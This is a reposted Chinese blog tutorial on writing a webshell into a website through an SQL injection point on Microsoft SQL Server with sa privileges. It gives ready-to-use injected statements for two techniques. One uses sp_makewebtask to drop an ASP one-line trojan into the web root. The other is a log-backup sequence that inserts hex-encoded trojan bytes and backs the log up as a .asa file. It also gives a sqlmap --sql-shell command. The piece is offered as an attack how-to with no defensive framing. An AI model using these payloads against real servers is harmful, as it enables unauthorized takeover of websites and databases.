注入点写webshell

淡淡的烟草味﹌ 2023-10-12 08:05 35阅读 0赞

两种方法：

方法一：sa权限makewebbtack写入

要求：1.必须知道网站物理路径（网站存放的目录）

2.必须有足够大的权限（db以上有列目录的权限）

3.最好是mssql2000 2005

4.开启了makewebbtack写入功能

1.进行sql注入，查看当前库（nmgeip），以及权限（sa）

![1669017-20190919100729434-1693134792.png][]

2.找到物理路径（C:/nmgeip）

![1669017-20190919101307769-877707286.png][]

另一种 列目录方法：用sqlmap加参数--os-cmd"命令"

3.sa权限，通过makewebtask，写入一句话

手动sql注入

';exec sp\_makewebtask 'c:\\nmgeip\\nmg.asp',' select ''<%25execute(request("a"))%25>'' ';--

方法二：sa权限 log日志备份上传webshell

条件：1.网站物理路径

2.数据库名称

3.权限够大

第一步：  
;alter database nmgeip set RECOVERY FULL--

第二步：  
create table cmd (a image)--

第三步：  
backup log alsm\_web\_cms to disk = 'D:\\cmd' with init--

第四步：  
insert into cmd (a) values (0x3C256576616C20726571756573742822332229253E)--

一句话木马：<%execute request("3")%>  
hex：0x3C256578656375746520726571756573742822736372697074626F792229253E

第五步：  
backup log nmgeip to disk = 'c:\\nmgeip\\w.asa'--

第六步：  
drop table cmd--

以上操作也可以这么实现：

C:\\Users\\命运\\Desktop\\安全\\sqlmap\\sqlmapproject-sqlmap-6ec6e86>python sqlmap.py -u "http://10.6.1.54:82/Info/InfoDetail.aspx?id=485" --sql-shell

转载于:https://www.cnblogs.com/abels0025/p/11547489.html

[1669017-20190919100729434-1693134792.png]: https://img2018.cnblogs.com/blog/1669017/201909/1669017-20190919100729434-1693134792.png
[1669017-20190919101307769-877707286.png]: https://img2018.cnblogs.com/blog/1669017/201909/1669017-20190919101307769-877707286.png

发表评论取消回复

表情：

评论列表（有 0 条评论，35人围观）

还没有评论，来说两句吧...

相关阅读

相关 webshell注入-防止DDos攻击-暴力破解root密码-自动劫持密码发送邮件

、 webshell使用方法 1、攻击思路想要拿下一台主机A的权限： 1）了解一下这个服务器：端口，服务器版本，操作系统版本。找漏洞。 2）拿到对A有...

红太狼/ 2024年04月17日 05:57/ 0 赞/ 94 阅读

相关 webshell提权教程

WEB提权常见的方法：第一如果服务器上有装了pcanywhere服务端，管理员为了管理方便也给了我们方便，到系统盘的Documents and Settings/A

系统管理员/ 2024年03月23日 18:58/ 0 赞/ 45 阅读

相关注入点写webshell

两种方法：方法一：sa权限makewebbtack写入要求：1.必须知道网站物理路径（网站存放的目录）　　　2.必须有足够大的权限（db以上有列目录的权限）　　

淡淡的烟草味﹌/ 2023年10月12日 08:05/ 0 赞/ 36 阅读

相关 sql注入典型知识点

sql注入典型知识点常见语句 1. SQL 注释语句 ("--"与"/\...\/") 2.SELECT 查询语句 3.U

Myth丶恋晨/ 2023年03月01日 05:48/ 0 赞/ 123 阅读

相关 php 实现webshell

php实现webshell主要依靠swoole和ssh2扩展，前端展示页面使用xterm 废话不多说直接上代码后端代码 <?php /

r囧r小猫/ 2022年12月28日 07:25/ 0 赞/ 206 阅读

相关 SQL注入知识点全

SQL注入学习基础知识点盲注脚本常用的后台类型万能密码过滤函数 union绕过型 sql

╰半橙微兮°/ 2022年12月16日 03:55/ 0 赞/ 377 阅读

相关 webshell工具原理

我最近又在看knief原理。我上一次看是6个月之前。我现在是有了实践的感觉再回头看看理论。首先说一句话木马原理。比如文件a.php里写了如下 <?php @ev

╰+哭是因爲堅強的太久メ/ 2022年11月05日 08:52/ 0 赞/ 128 阅读

相关攻防世界-WEB-新手-webshell

【题目描述】小宁百度了php一句话,觉着很有意思,并且把它放在index.php里。【附件】在线场景【过程及思路】打开在线场景后出现如下字样：

ゝ一纸荒年。/ 2022年09月14日 09:55/ 0 赞/ 206 阅读

相关 webshell

漏洞原理

待我称王封你为后i/ 2022年06月13日 22:52/ 0 赞/ 248 阅读

相关 weevely（webshell）用法命令参数

简介 weevely 属于php 的 webshell 工具。但相较于 webacoo ，weevely 的功能更加强大，同时对于webshell的连接设立了密码选项！并且

柔光的暖阳◎/ 2021年09月28日 03:52/ 0 赞/ 396 阅读